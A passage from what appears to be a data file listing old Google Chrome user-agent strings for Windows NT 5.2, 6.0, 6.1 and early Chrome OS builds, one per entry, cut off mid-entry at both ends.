Safari/525.13\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.30 Safari/525.13\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.6 Safari/525.13\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.151.0 Safari/525.19\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.3.154.6 Safari/525.19\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.43 Safari/525.19\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.59 Safari/525.19\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/530.4 (KHTML, like Gecko) Chrome/2.0.172.0 Safari/530.4\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/531.3 (KHTML, like Gecko) Chrome/3.0.193.2 Safari/531.3\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.21 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.6 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.0 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.2 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.1 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.210.0 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.212.0 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.0 Safari/532.1\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.1 Safari/532.1\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.3 Safari/532.1\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.5 Safari/532.1\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.6 Safari/532.2\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.6 Safari/532.2\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.2 Safari/532.2\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.126 Safari/533.4\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.540.0 Safari/534.10\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.558.0 Safari/534.10\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/11.0.652.0 Safari/534.17\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/6.0.454.0 Safari/534.2\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.458.0 Safari/534.3\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.460.0 Safari/534.3\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.462.0 Safari/534.3\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.463.0 Safari/534.3\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.33 Safari/534.3\nMozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.4 (KHTML, like Gecko) Chrome/6.0.481.0 Safari/534.4\nMozilla/5.0 (Windows; U; Windows NT 5.2; eu) AppleWebKit/530.4 (KHTML, like Gecko) Chrome/2.0.172.0 Safari/530.4\nMozilla/5.0 (Windows; U; Windows NT 6.0; de) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.29 Safari/525.13\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.30 Safari/525.13\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.6 Safari/525.13\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.151.0 Safari/525.19\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.152.0 Safari/525.19\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.153.0 Safari/525.19\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.4.154.31 Safari/525.19\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.42 Safari/525.19\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.43 Safari/525.19\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.46 Safari/525.19\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.50 Safari/525.19\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.59 Safari/525.19\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/528.10 (KHTML, like Gecko) Chrome/2.0.157.2 Safari/528.10\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/528.11 (KHTML, like Gecko) Chrome/2.0.157.0 Safari/528.11\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/528.8 (KHTML, like Gecko) Chrome/2.0.156.1 Safari/528.8\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.0 (KHTML, like Gecko) Chrome/2.0.160.0 Safari/530.0\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.0 (KHTML, like Gecko) Chrome/2.0.162.0 Safari/530.0\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.1 (KHTML, like Gecko) Chrome/2.0.164.0 Safari/530.1\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.1 (KHTML, like Gecko) Chrome/2.0.168.0 Safari/530.1\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.4 (KHTML, like Gecko) Chrome/2.0.171.0 Safari/530.4\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.23 Safari/530.5\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.2 Safari/530.5\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.40 Safari/530.5\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.6 Safari/530.5\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.173.1 Safari/530.5\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/2.0.174.0 Safari/530.6\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.7 (KHTML, like Gecko) Chrome/2.0.176.0 Safari/530.7\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.3 (KHTML, like Gecko) Chrome/3.0.193.0 Safari/531.3\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.3 (KHTML, like Gecko) Chrome/3.0.193.2 Safari/531.3\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.10 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.17 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.1 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.20 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.21 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.3 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.6 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.196.2 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.197.11 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.198.0 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.201.1 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.0 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.2 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.1 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.208.0 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.4 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.7 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.1 Safari/532.1\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.220.1 Safari/532.1\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.6 Safari/532.2\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.12 Safari/532.2\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.0 Safari/532.2\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.3 (KHTML, like Gecko) Chrome/4.0.224.2 Safari/532.3\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.241.0 Safari/532.4\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.5 Safari/533.2\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/533.3\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.127 Safari/533.4\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.458.1 Safari/534.3\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.8 (KHTML, like Gecko) Chrome/7.0.521.0 Safari/534.8\nMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.107 Safari/535.1\nMozilla/5.0 (Windows; U; Windows NT 6.0 (x86_64); de-DE) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.2 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.1) AppleWebKit/526.3 (KHTML, like Gecko) Chrome/14.0.564.21 Safari/526.3\nMozilla/5.0 (Windows; U; Windows NT 6.1; de-DE) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.540.0 Safari/534.10\nMozilla/5.0 (Windows; U; Windows NT 6.1; de-DE) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10\nMozilla/5.0 (Windows; U; Windows NT 6.1; de-DE) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/10.0.649.0 Safari/534.17\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-GB) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.428.0 Safari/534.1\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.3.154.9 Safari/525.19\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.43 Safari/525.19\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/528.8 (KHTML, like Gecko) Chrome/1.0.156.0 Safari/528.8\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/528.8 (KHTML, like Gecko) Chrome/2.0.156.1 Safari/528.8\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.0 (KHTML, like Gecko) Chrome/2.0.182.0 Safari/531.0\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.4 (KHTML, like Gecko) Chrome/2.0.172.0 Safari/530.4\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/2.0.174.0 Safari/530.6\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/2.0.182.0 Safari/531.0\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/2.0.182.0 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/3.0.191.0 Safari/531.0\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/531.3 (KHTML, like Gecko) Chrome/3.0.193.2 Safari/531.3\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/531.4 (KHTML, like Gecko) Chrome/3.0.194.0 Safari/531.4\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.10 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.1 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.21 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.3 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.4 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.6 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.196.2 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.197.0 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.197.11 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.201.1 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.0 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.0 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.2 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.204.0 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.0 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.1 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.208.0 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.0 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.4 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.212.0 Safari/532.0\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.1 Safari/532.1\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.12 Safari/532.2\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.3 Safari/532.2\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.1 Safari/532.2\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.3 (KHTML, like Gecko) Chrome/4.0.223.5 Safari/532.3\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.3 (KHTML, like Gecko) Chrome/4.0.227.0 Safari/532.3\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.246.0 Safari/532.5\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1025 Safari/532.5\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.307.1 Safari/532.9\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.3 Safari/533.2\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/6.0\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.354.0 Safari/533.3\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.370.0 Safari/533.4\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.999 Safari/533.4\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.9 (KHTML, like Gecko) Chrome/6.0.400.0 Safari/533.9\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.540.0 Safari/534.10\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.596.0 Safari/534.13\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.19 Safari/534.13\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.638.0 Safari/534.16\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.11 Safari/534.16\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.134 Safari/534.16\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/10.0.649.0 Safari/534.17\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/11.0.654.0 Safari/534.17\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/11.0.655.0 Safari/534.17\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.428.0 Safari/534.1\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.669.0 Safari/534.20\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/6.0.454.0 Safari/534.2\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.458.1 Safari/534.3\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.459.0 Safari/534.3\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.460.0 Safari/534.3\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.461.0 Safari/534.3\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.464.0 Safari/534.3\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.498.0 Safari/534.6\nMozilla/5.0 (Windows; U; Windows NT 6.1; it-IT) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.25 Safari/532.5\nMozilla/5.0 (Windows; U; Windows NT 6.1; ru-RU; AppleWebKit/534.16; KHTML; like Gecko; Chrome/10.0.648.11;Safari/534.16)\nMozilla/5.0 (Windows; U; Windows NT 6.1; ru-RU) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.11 Safari/534.16\nMozilla/5.0 (X11; CrOS i686 0.13.507) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/13.0.763.0 Safari/534.35\nMozilla/5.0 (X11; CrOS i686 0.13.587) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.14 Safari/535.1\nMozilla/5.0 (X11; CrOS i686 1193.158.0) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7\nMozilla/5.0 (X11; CrOS i686 12.0.742.91) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.93 Safari/534.30\nMozilla/5.0 (X11; CrOS i686 12.433.109) 